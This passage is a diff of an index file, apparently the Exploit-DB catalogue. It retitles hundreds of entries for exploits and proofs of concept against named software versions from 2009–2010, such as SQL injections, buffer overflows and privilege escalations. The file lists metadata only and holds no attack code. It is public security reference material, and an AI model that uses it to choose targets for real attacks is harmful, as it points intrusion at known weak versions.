(topic_id) SQL Injection / Credentials Disclosure",2009-04-03,StAkeR,php,webapps,0 +8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - 'topic_id' SQL Injection / Credentials Disclosure",2009-04-03,StAkeR,php,webapps,0 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0 8353,platforms/php/webapps/8353.txt,"Joomla! Component com_bookJoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",php,webapps,0 8354,platforms/windows/remote/8354.py,"XBMC 8.10 - GET Request Remote Buffer Overflow (SEH) (Universal)",2009-04-06,n00b,windows,remote,80 @@ -7921,7 +7921,7 @@ id,file,description,date,author,platform,type,port 8405,platforms/windows/dos/8405.pl,"Mini-stream RM-MP3 Converter - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos,0 8406,platforms/openbsd/dos/8406.txt,"OpenBSD 4.5 - (IP datagrams) Remote Denial of Service",2009-04-13,Rembrandt,openbsd,dos,0 8407,platforms/windows/dos/8407.pl,"ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos,0 -8408,platforms/php/webapps/8408.txt,"X10Media Mp3 - Search Engine < 1.6.2 Admin Access",2009-04-13,THUNDER,php,webapps,0 +8408,platforms/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 Admin Access",2009-04-13,THUNDER,php,webapps,0 8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - 'lang' Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0 8410,platforms/windows/local/8410.pl,"RM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local,0 8411,platforms/windows/local/8411.c,"WM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local,0 @@ -7978,9 +7978,9 @@ id,file,description,date,author,platform,type,port 8462,platforms/windows/dos/8462.pl,"MagicISO CCD/Cue - Local Heap Overflow (PoC)",2009-04-16,Stack,windows,dos,0 8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Directory Traversal",2009-04-16,e.wiZz!,windows,remote,0 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - (Authentication Bypass) SQL Injection",2009-04-17,"Salvatore Fresta",php,webapps,0 -8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - (quartz.dll .mid) Denial of Service",2009-04-17,"Code Audit Labs",windows,dos,0 +8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - 'quartz.dll .mid' Denial of Service",2009-04-17,"Code Audit Labs",windows,dos,0 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin - '.png' Infinite Loop Denial of Service (PoC)",2009-04-17,"Code Audit Labs",windows,dos,0 -8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - (quartz.dll .wav) Multiple Remote Denial of Service Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos,0 +8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - 'quartz.dll .wav' Multiple Remote Denial of Service Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos,0 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0 8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",linux,dos,0 8470,platforms/linux/local/8470.py,"cTorrent/DTorrent - '.torrent' Buffer Overflow",2009-04-17,"Michael Brooks",linux,local,0 @@ -8286,7 +8286,7 @@ id,file,description,date,author,platform,type,port 8779,platforms/php/webapps/8779.txt,"Joomla! Component Boy Scout Advancement 0.3 - 'id' SQL Injection",2009-05-26,YEnH4ckEr,php,webapps,0 8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow",2009-05-26,Nine:Situations:Group,windows,local,0 8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion",2009-05-26,girex,php,webapps,0 -8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - (ps_drv.sys) Privilege Escalation",2009-05-26,"NT Internals",windows,local,0 +8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Privilege Escalation",2009-05-26,"NT Internals",windows,local,0 8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0 8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - (vbplaza.php) Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps,0 8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET - Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps,0 @@ -8327,7 +8327,7 @@ id,file,description,date,author,platform,type,port 8821,platforms/php/webapps/8821.txt,"Joomla! Component JVideo 0.3.x - SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps,0 8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service",2009-05-29,"Thierry Zoller",multiple,dos,0 8823,platforms/php/webapps/8823.txt,"WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0 -8824,platforms/windows/remote/8824.html,"Roxio CinePlayer 3.2 - (SonicMediaPlayer.dll) Remote Buffer Overflow",2009-05-29,snakespc,windows,remote,0 +8824,platforms/windows/remote/8824.html,"Roxio CinePlayer 3.2 - 'SonicMediaPlayer.dll' Remote Buffer Overflow",2009-05-29,snakespc,windows,remote,0 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0 8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OSX/Windows) - Stack Overflow Crash (PoC)",2009-05-29,"Saint Patrick",multiple,dos,0 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0 @@ -8338,7 +8338,7 @@ id,file,description,date,author,platform,type,port 8832,platforms/windows/dos/8832.php,"ICQ 6.5 - URL Search Hook (Windows Explorer) Remote Buffer Overflow (PoC)",2009-06-01,Nine:Situations:Group,windows,dos,0 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 - Web Management Console Arbitrary Command Execution",2009-06-01,Securitum,hardware,local,0 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection",2009-06-01,Br0ly,php,webapps,0 -8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 - (IAManager.dll) Remote Buffer Overflow (heap spray)",2009-06-01,His0k4,windows,remote,0 +8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 - 'IAManager.dll' Remote Buffer Overflow (heap spray)",2009-06-01,His0k4,windows,remote,0 8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 - Multiple SQL Injections",2009-06-01,"Nico Leidecker",php,webapps,0 8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - (ID3v1/ID3v2 Tag) Remote Stack Buffer Overflow PoC (SEH)",2009-06-01,LiquidWorm,windows,dos,0 8838,platforms/php/webapps/8838.txt,"elitecms 1.01 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-01,xeno_hive,php,webapps,0 @@ -8353,7 +8353,7 @@ id,file,description,date,author,platform,type,port 8848,platforms/php/webapps/8848.txt,"ecsportal rel 6.5 - (article_view_photo.php id) SQL Injection",2009-06-01,taRentReXx,php,webapps,0 8849,platforms/asp/webapps/8849.txt,"R2 NewsLetter Lite/Pro/Stats - 'admin.mdb' Database Disclosure",2009-06-01,TiGeR-Dz,asp,webapps,0 8850,platforms/php/webapps/8850.txt,"PAD Site Scripts 3.6 - Arbitrary Database Backup",2009-06-01,TiGeR-Dz,php,webapps,0 -8851,platforms/php/webapps/8851.txt,"AdaptBB 1.0 - (forumspath) Remote File Inclusion",2009-06-01,"Mehmet Ince",php,webapps,0 +8851,platforms/php/webapps/8851.txt,"AdaptBB 1.0 - 'forumspath' Remote File Inclusion",2009-06-01,"Mehmet Ince",php,webapps,0 8852,platforms/php/webapps/8852.txt,"ASP Football Pool 2.3 - Remote Database Disclosure",2009-06-01,ByALBAYX,php,webapps,0 8853,platforms/php/webapps/8853.txt,"Online Grades & Attendance 3.2.6 - Multiple Local File Inclusion",2009-06-02,YEnH4ckEr,php,webapps,0 8854,platforms/php/webapps/8854.pl,"Online Grades & Attendance 3.2.6 - Blind SQL Injection",2009-06-02,YEnH4ckEr,php,webapps,0 @@ -8377,7 +8377,7 @@ id,file,description,date,author,platform,type,port 8872,platforms/php/webapps/8872.txt,"Joomla! Component com_mosres - Multiple SQL Injections",2009-06-03,"Chip d3 bi0s",php,webapps,0 8873,platforms/multiple/dos/8873.c,"OpenSSL < 0.9.8i - DTLS ChangeCipherSpec Remote Denial of Service",2009-06-04,"Jon Oberheide",multiple,dos,0 8874,platforms/php/webapps/8874.txt,"SuperCali PHP Event Calendar - Arbitrary Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0 -8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 - (OAmon.sys) Privilege Escalation",2009-06-04,"NT Internals",windows,local,0 +8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 - 'OAmon.sys' Privilege Escalation",2009-06-04,"NT Internals",windows,local,0 8876,platforms/php/webapps/8876.htm,"Web Directory PRO - 'Admins.php' Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0 8877,platforms/php/webapps/8877.txt,"Host Directory PRO 2.1.0 - Remote Database Backup",2009-06-04,ZoRLu,php,webapps,0 8878,platforms/php/webapps/8878.txt,"Web Directory PRO - Remote Database Backup",2009-06-04,TiGeR-Dz,php,webapps,0 @@ -8467,7 +8467,7 @@ id,file,description,date,author,platform,type,port 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Cross-Site Scripting",2009-06-15,"ThE g0bL!N",php,webapps,0 8968,platforms/php/webapps/8968.txt,"Joomla! Component com_jumi - (fileid) Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0 8969,platforms/windows/remote/8969.rb,"Green Dam 3.17 - URL Processing Buffer Overflow (Metasploit)",2009-06-16,Trancer,windows,remote,0 -8970,platforms/windows/remote/8970.txt,"McAfee 3.6.0.608 - naPolicyManager.dll ActiveX Arbitrary Data Write",2009-06-16,callAX,windows,remote,0 +8970,platforms/windows/remote/8970.txt,"McAfee 3.6.0.608 - 'naPolicyManager.dll' ActiveX Arbitrary Data Write",2009-06-16,callAX,windows,remote,0 8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,windows,dos,0 8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - (.htaccess) Remote File Disclosure",2009-06-16,daath,php,webapps,0 8975,platforms/php/webapps/8975.txt,"PHPFK 7.03 - (page_bottom.php) Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0 @@ -8478,7 +8478,7 @@ id,file,description,date,author,platform,type,port 8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Blind SQL Injection",2009-06-17,YEnH4ckEr,php,webapps,0 8981,platforms/php/webapps/8981.txt,"phportal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 8982,platforms/linux/dos/8982.txt,"compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)",2009-06-17,metalhoney,linux,dos,0 -8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 - dlpcrypt.sys Local Kernel Ring0 Code Execution",2009-06-18,mu-b,windows,local,0 +8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 - 'dlpcrypt.sys' Local Kernel Ring0 Code Execution",2009-06-18,mu-b,windows,local,0 8984,platforms/php/webapps/8984.txt,"CMS buzz - (Cross-Site Scripting / Password Change/HTML Injection) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,windows,remote,0 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 - (Authentication Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps,0 @@ -8699,7 +8699,7 @@ id,file,description,date,author,platform,type,port 9213,platforms/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)",2009-07-20,"D3V!L FUCK3R",windows,dos,0 9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (2)",2009-07-20,netsoul,windows,remote,0 9215,platforms/windows/local/9215.pl,"Streaming Audio Player 0.9 - (skin) Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 -9216,platforms/windows/local/9216.pl,"Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 +9216,platforms/windows/local/9216.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - (lid) SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0 9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0 9220,platforms/windows/dos/9220.pl,"KMplayer 2.9.4.1433 - '.srt' Local Buffer Overflow (PoC)",2009-07-20,b3hz4d,windows,dos,0 @@ -8816,8 +8816,8 @@ id,file,description,date,author,platform,type,port 9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - (Authentication Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0 9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - (Authentication Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0 9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0 -9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 -9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 +9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0 +9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Authentication Bypass) SQL Injection",2009-08-03,snakespc,php,webapps,0 9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-03,"599eme Man",php,webapps,0 @@ -8919,7 +8919,7 @@ id,file,description,date,author,platform,type,port 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0 9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection",2009-08-18,NoGe,php,webapps,0 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 -9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client - tgbvpn.sys Local Denial of Service",2009-08-18,Evilcry,windows,dos,0 +9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client - 'tgbvpn.sys' Local Denial of Service",2009-08-18,Evilcry,windows,dos,0 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 @@ -8950,7 +8950,7 @@ id,file,description,date,author,platform,type,port 9477,platforms/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Privilege Escalation",2009-08-18,Zinx,android,local,0 9478,platforms/windows/dos/9478.pl,"BugHunter HTTP Server 1.6.2 - 'httpsv.exe' (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local,0 -9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0 +9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - 'fix.dll 1.0.0.1' Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Authentication Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0 9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - '.psh' Universal Buffer Overflow XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0 @@ -9098,7 +9098,7 @@ id,file,description,date,author,platform,type,port 9629,platforms/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload",2009-09-10,"Alexander Concha",php,webapps,0 9630,platforms/php/webapps/9630.txt,"MYRE Holiday Rental Manager - 'action' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9631,platforms/php/webapps/9631.txt,"iDesk - 'download.php cat_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 -9632,platforms/php/webapps/9632.txt,"Accommodation Hotel Booking Portal - (hotel_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 +9632,platforms/php/webapps/9632.txt,"Accommodation Hotel Booking Portal - 'hotel_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9633,platforms/php/webapps/9633.txt,"Bus Script - (sitetext_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9634,platforms/php/webapps/9634.txt,"Adult Portal escort listing - (user_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9635,platforms/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",php,webapps,0 @@ -9385,7 +9385,7 @@ id,file,description,date,author,platform,type,port 10004,platforms/multiple/dos/10004.txt,"Dopewars 1.5.12 Server - Denial of Service",2009-10-06,"Doug Prostko",multiple,dos,7902 10005,platforms/windows/dos/10005.py,"Microsoft Windows 7 / Server 2008R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 - Exploit",2009-10-08,"Mark from infosecstuff",php,webapps,0 -10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 - ActiveX Control Remote Buffer Overflow",2009-11-12,"Will Dormann",windows,remote,0 +10007,platforms/windows/remote/10007.html,"EasyMail Objects 'EMSMTP.DLL 6.0.1' - ActiveX Control Remote Buffer Overflow",2009-11-12,"Will Dormann",windows,remote,0 10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 @@ -9476,10 +9476,10 @@ id,file,description,date,author,platform,type,port 10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21 10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2009-11-16,"Jeremy Brown",windows,dos,80 -10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - (jar50.dll) Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0 +10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - 'jar50.dll' Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0 10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service",2009-11-13,zhangmc,windows,dos,21 10105,platforms/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 -10106,platforms/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 +10106,platforms/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - 'aswMon2.sys' Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 40083,platforms/php/webapps/40083.txt,"WordPress Plugin Activity Log 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80 10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote Denial of Service",2009-11-17,"Marc Doudiet",windows,dos,21 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass / Arbitrary File Upload",2009-11-17,blackenedsecurity,asp,webapps,0 @@ -9662,7 +9662,7 @@ id,file,description,date,author,platform,type,port 10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL Injection / XPath Injection",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps,0 10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)",2009-12-10,"loneferret germaya_x",windows,local,0 10374,platforms/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700 - Exploit",2009-12-10,"Vinod Sharma",windows,local,0 -10375,platforms/windows/remote/10375.html,"SAP GUI for Windows - sapirrfc.dll ActiveX Overflow",2009-12-10,Abysssec,windows,remote,0 +10375,platforms/windows/remote/10375.html,"SAP GUI for Windows - 'sapirrfc.dll' ActiveX Overflow",2009-12-10,Abysssec,windows,remote,0 10376,platforms/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80 10377,platforms/windows/dos/10377.txt,"IBM SolidDB - Invalid Error Code",2009-11-18,"Core Security",windows,dos,2315 10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0 @@ -10311,7 +10311,7 @@ id,file,description,date,author,platform,type,port 11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 - '.mp3' Local Crash (PoC)",2010-01-22,"cr4wl3r ",windows,dos,0 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 - '.mp3' / '.pls' Local Crash (PoC)",2010-01-22,"cr4wl3r ",windows,dos,0 11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,windows,local,0 -11232,platforms/windows/local/11232.c,"Authentium SafeCentral 2.6 - shdrv.sys Local kernel Ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0 +11232,platforms/windows/local/11232.c,"Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0 11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote Denial of Service/Crash",2010-01-22,"Zer0 Thunder",windows,dos,0 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash (PoC)",2010-01-23,b0telh0,windows,dos,0 11235,platforms/php/webapps/11235.txt,"magic-portal 2.1 - SQL Injection",2010-01-23,alnjm33,php,webapps,0 @@ -10690,7 +10690,7 @@ id,file,description,date,author,platform,type,port 11681,platforms/php/webapps/11681.txt,"ispCP Omega 1.0.4 - Remote File Inclusion",2010-03-10,"cr4wl3r ",php,webapps,0 14092,platforms/windows/local/14092.c,"Kingsoft Writer 2010 - Stack Buffer Overflow",2010-06-28,"fl0 fl0w",windows,local,0 11682,platforms/windows/local/11682.py,"Mini-stream Ripper 3.0.1.1 - '.m3u' HREF Buffer Overflow",2010-03-10,l3D,windows,local,0 -11683,platforms/windows/remote/11683.rb,"Microsoft Internet Explorer - iepeers.dll Use-After-Free Exploit (Metasploit)",2010-03-10,Trancer,windows,remote,0 +11683,platforms/windows/remote/11683.rb,"Microsoft Internet Explorer - 'iepeers.dll' Use-After-Free Exploit (Metasploit)",2010-03-10,Trancer,windows,remote,0 11684,platforms/php/webapps/11684.txt,"Joomla! Component com_about - SQL Injection",2010-03-11,snakespc,php,webapps,0 11685,platforms/php/webapps/11685.txt,"ATutor 1.6.4 - Multiple Cross-Site Scripting",2010-03-11,ITSecTeam,php,webapps,0 11686,platforms/php/webapps/11686.txt,"ANE CMD CRSF - Add Admin",2010-03-11,"pratul agrawal",php,webapps,0 @@ -10755,7 +10755,7 @@ id,file,description,date,author,platform,type,port 11747,platforms/php/webapps/11747.txt,"CH-CMS.ch 2 - Arbitrary File Upload",2010-03-15,EL-KAHINA,php,webapps,0 11748,platforms/php/webapps/11748.txt,"Interspire SHOPPING CART 5.5.4 - Ultimate Edition backup dump",2010-03-15,indoushka,php,webapps,0 11749,platforms/php/webapps/11749.txt,"Subdreamer 3.0.1 - CMS upload",2010-03-15,indoushka,php,webapps,0 -11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote Overflow",2010-03-15,mr_me,windows,remote,0 +11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow",2010-03-15,mr_me,windows,remote,0 11752,platforms/php/webapps/11752.txt,"Joomla! Component com_org - SQL Injection (letter Parameter)",2010-03-15,kazuya,php,webapps,0 11754,platforms/php/webapps/11754.txt,"Address Book Script 1.09 - Local File Inclusion",2010-03-15,"Pouya Daneshmand",php,webapps,0 11755,platforms/php/webapps/11755.txt,"osDate 2.1.9 - Remote File Inclusion",2010-03-15,NoGe,php,webapps,0 @@ -10833,7 +10833,7 @@ id,file,description,date,author,platform,type,port 11836,platforms/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps,0 14128,platforms/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0 11837,platforms/php/webapps/11837.txt,"Uiga Fan Club - SQL Injection",2010-03-22,"Sioma Labs",php,webapps,0 -11838,platforms/windows/dos/11838.php,"SAFARI APPLE 4.0.5 - (object tag) (JavaScriptCore.dll) Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 +11838,platforms/windows/dos/11838.php,"SAFARI APPLE 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0 11840,platforms/php/webapps/11840.txt,"PowieSys 0.7.7 alpha - 'index.php' (shownews) SQL Injection",2010-03-22,"Easy Laster",php,webapps,0 11841,platforms/php/webapps/11841.txt,"New Advisore Stack 1.1 - Directory Traversal",2010-03-22,R3VAN_BASTARD,php,webapps,0 @@ -11066,7 +11066,7 @@ id,file,description,date,author,platform,type,port 12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost - Multiple Vulnerabilities",2010-04-07,indoushka,php,webapps,0 12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion",2010-04-07,eidelweiss,php,webapps,0 12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0 -12109,platforms/multiple/dos/12109.txt,"Multiple Vendor librpc.dll Signedness Error - Remote Code Execution",2010-04-08,ZSploit.com,multiple,dos,0 +12109,platforms/multiple/dos/12109.txt,"Multiple Vendor 'librpc.dll' Signedness Error - Remote Code 